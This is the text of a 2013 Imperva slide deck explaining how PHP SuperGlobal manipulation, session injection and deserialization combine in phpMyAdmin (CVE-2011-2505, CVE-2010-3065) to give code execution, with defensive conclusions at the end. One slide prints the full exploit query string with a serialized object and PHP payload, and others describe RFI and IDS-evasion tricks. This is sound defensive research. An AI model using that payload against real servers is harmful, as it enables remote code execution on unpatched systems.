© 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals: Supersized Trouble 1 Shelly Hershkovitz, Senior Security Analyst, Imperva
Feb 23, 2016
1 © 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobals: Supersized Trouble
Shelly Hershkovitz, Senior Security Analyst, Imperva
© 2013 Imperva, Inc. All rights reserved.
Shelly Hershkovitz
2
Senior Security Analyst at Imperva Leads the efforts to capture and analyze hacking
activities• Responsible for number of Imperva’s HII reports
Experienced in machine learning and computer vision Holds BA in Computer Science & M.Sc degree in Bio-
Medical Engineering
© 2013 Imperva, Inc. All rights reserved.
How it all began…
3
Bla bla…CVE-2011-2505
Honeypots
© 2013 Imperva, Inc. All rights reserved.
Agenda
5
Introduction• Relevant PHP background
An Anatomy of a Modern Web Exploit• Abusing SuperGlobals
Demo Additional PHP SuperGlobal Attacks
• In the wild
Summary & Conclusions Q&A
© 2013 Imperva, Inc. All rights reserved.6
Introduction
Relevant PHP background
© 2013 Imperva, Inc. All rights reserved.
The most popular server-side programming language in the world:
And goes from strength to strength
Breadth and Depth of PHP - I
© 2013 Imperva, Inc. All rights reserved.
The most popular web applications are powered by PHP
Breadth and Depth of PHP – II
http://www.alexa.com/topsites
© 2013 Imperva, Inc. All rights reserved.
Outline – PHP Background
9
SuperGlobals
Serialization Session Management
© 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobals
10
“Local” versus “global” scopes Global variables
• Cross-function communication• *ANY* function may change them
SuperGlobals:• Predefined array variables• Available in all scopes
SuperGlobals: cookies, sessions, environment, etc.
© 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobal list
11
Variable Definition
1 GLOBALSReferences all variables
available in global scope
2 _SERVERServer and execution
environment information
3 _GET HTTP GET variables
4 _POST HTTP POST variables
5 _FILES HTTP File upload variables
6 _COOKIE HTTP Cookies
7 _SESSION Session variables
8 _REQUEST HTTP Request variables
9 _ENV Environment variables
© 2013 Imperva, Inc. All rights reserved.
External Variable Modification
12
MITRE Common Weakness Enumeration: CWE-473 “A PHP application does not properly protect against the
modification of variables from external sources, such as query parameters or cookies”.
SuperGlobals are a natural target:• Exist in every PHP application• Provide access to the server’s core functionality
© 2013 Imperva, Inc. All rights reserved.
Serialization
13
The process of saving data stored in memory to file is called “serialization”
The process of loading data stored in file to memory is called “deserialization”
http://www.studytonight.com/java/images/Serialization-deserialization.JPG
__sleep() __wakeup()
© 2013 Imperva, Inc. All rights reserved.
PHP Session Management
14
New user:• Unique identifier for the session.• A cookie called PHPSESSID is sent to the user with
this identifier. • A file is created on the server, for example:
sess_1q8jkgkoetd3dprcb3n7mpmc4o26eili. Resuming session data.
© 2013 Imperva, Inc. All rights reserved.
An Anatomy of a Modern Web Exploit
15
Exploiting SuperGlobals
© 2013 Imperva, Inc. All rights reserved.
Outline
16
PHPMyAdmin CVE-2011-2505 CVE-2010-3065 Attack Flow Demo Attacks on the wild
© 2013 Imperva, Inc. All rights reserved.
PHPMyAdmin (PMA)
17
The most popular MySQL administration tool for PHP Often is bundled by default in LAMP (Linux, Apache,
MySQL, PHP) installations
© 2013 Imperva, Inc. All rights reserved.
Outline – PHP Background
18
SuperGlobals CVE-2010-3065
Session ManagementSerialization
CVE-2011-2505
© 2013 Imperva, Inc. All rights reserved.
CVE-2011-2505: PhpMyAdmin Vulnerability
19
Parses a given query string to local scope _SESSION variables are saved in the session’s file on
the server
http://www.super.com/somePage?_SESSION[username]=bad_stuff
username|s:9:"bad_stuff";
© 2013 Imperva, Inc. All rights reserved.
CVE-2011-2505: PhpMyAdmin Vulnerability
20
PhpMyAdmin’s Unset session functionality Parse_str() : parses the given query string and stores the
variables in the current scope. Session_write_close(): Makes Session data persistent
throughout the entire user’s session.
© 2013 Imperva, Inc. All rights reserved.
CVE-2011-2505: Exploit
21
An attacker can now • Craft a malicious query string with the _SESSION SuperGlobal • Injected _SESSION value overrides the session’s original values • New values are saved to local file
© 2013 Imperva, Inc. All rights reserved.
Discovered by Stefan Esser - Late 2010 Attacker can write data to the _SESSION in
*ANY* format, if the session variable name starts with ‘!’
CVE-2010-3065 PHP Vulnerability & Exploit
22
© 2013 Imperva, Inc. All rights reserved.
Serialization
23
The process of saving data stored in memory to file is called “serialization”
The process of loading data stored in file to memory is called “deserialization”
http://www.studytonight.com/java/images/Serialization-deserialization.JPG
__sleep() __wakeup()
© 2013 Imperva, Inc. All rights reserved.
PMA Session deserialization: Vulnerability
24
On session deserialization, the load() function is called Eval is evil!
• Can be used to execute unexpected code
© 2013 Imperva, Inc. All rights reserved.
Attack Flow
25
An attacker sends the 1st request to receive a cookie
An attacker sends the 2nd request, _SESSION holds:1. Malicious code2. PMA_Config serialized object with source=session file path
PHP saves the session’s
information to local file
An attacker sends the 3rd request
PHP deserialize PMA_Config which calls __wakeup(), which calls load(),
which calls eval(source=sessio
n file)
© 2013 Imperva, Inc. All rights reserved.
The Exploit Code on the Web
26
© 2013 Imperva, Inc. All rights reserved.
Attack Flow
27
An attacker sends the 1st request to receive a cookie
An attacker sends the 2nd request, _SESSION holds:1. Malicious code2. PMA_Config serialized object with source=session file path
PHP saves the session’s information
to local file
An attacker sends the 3rd request
PHP unserialize PMA_Config which calls __wakeup(), which calls load(),
which calls eval(source=session
file)
© 2013 Imperva, Inc. All rights reserved.
Guessing Session Filename
28
Luckily for the attacker, the location of the session file is predictable
Session File name consists of• The “sess_” prefix• The session identifier – known to the user/attacker
File’s path is predictable• default values
© 2013 Imperva, Inc. All rights reserved.
Guessing Session Filename: in the wild
29
Multiple guesses for path the same session file (“sess_19qq…”)
© 2013 Imperva, Inc. All rights reserved.
The Final Exploit
30
Now the attackers can, *FINALLY*, get their code evaluated
/phpMyAdmin/index.php?session_to_unset=123&token=86498ff0a666f808df76ffaabee9b7a3&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:“source";s:59:"/var/lib/php5/sess_6a3e0376fbfe9797081a3ee202ef1ca85c451a62";}}&_SESSION[payload]=<?php phpinfo(); ?>
© 2013 Imperva, Inc. All rights reserved.
Demo
31
© 2013 Imperva, Inc. All rights reserved.
PMA SuperGlobal Attacks in the wild
32
Attacks source is a hacked server Attacks (at least) two other servers Attacks persist over half a year
© 2013 Imperva, Inc. All rights reserved.
A Modern Exploit Summary: Research
33
Sophisticated research Combines multiple vulnerabilities and issues in multiple
domains• PHPMyAdmin (PMA)• PHP internals
© 2013 Imperva, Inc. All rights reserved.
A Modern Exploit Summary: Development
34
Exploit packed in a single, “click once” PHP script Automates the different attack stages Can be launched from infected servers to infect others
© 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobal Attacks
35
In the wild
© 2013 Imperva, Inc. All rights reserved.
SuperGlobal Attacks Targets
36
RFI (Remote File Inclusion): trying to overwrite “_Server[document_root]” to point to external resource
© 2013 Imperva, Inc. All rights reserved.
SuperGlobal Attacks Targets
37
Part of general scanning against the site – Nikto, Acunetix, Nessus
Intrusion Detection System filter evasion: an alternative way to represent HTTP query parameters• “_REQUEST[Itemid]=1” request parameter is equivalent to
“Itemid=1” • However, it evades a naïve IDS signature that blacklists
“Itemid=1”
© 2013 Imperva, Inc. All rights reserved.
SuperGlobal Attacks Targets
38
During May 2013 3.5K requests that manipulated PHP SuperGlobal
variables. 27 different attack sources 24 web applications as targets
© 2013 Imperva, Inc. All rights reserved.
Targeted SuperGlobal
39
Some SuperGlobals are more targeted than others The more targeted SuperGlobals provide access to more
sensitive resources
GLOBALS55%
ENV14%
SERVER14%
SESSION13%
REQUEST4%
© 2013 Imperva, Inc. All rights reserved.
Summary & Conclusions
40
© 2013 Imperva, Inc. All rights reserved.
Third-Party Code Perils
43
PHPMyAdmin:• Popular utility installation• Often bundled with other applications
Even if PMA is not used, the server is exposed to code execution attacks!!
Administrators might not be aware to all bundled software An “opt out” security model is needed Optional solution is Web Application Firewall (WAF) with
constant updates of security content.
© 2013 Imperva, Inc. All rights reserved.
Conclusions
46
Establish a positive security model Use layered security mechanisms Beware of third-party code perils Block SuperGlobal parameters in requests
© 2013 Imperva, Inc. All rights reserved.47
More information in HII:http://www.imperva.com/resources/hacker_intelligence.asp
Q&A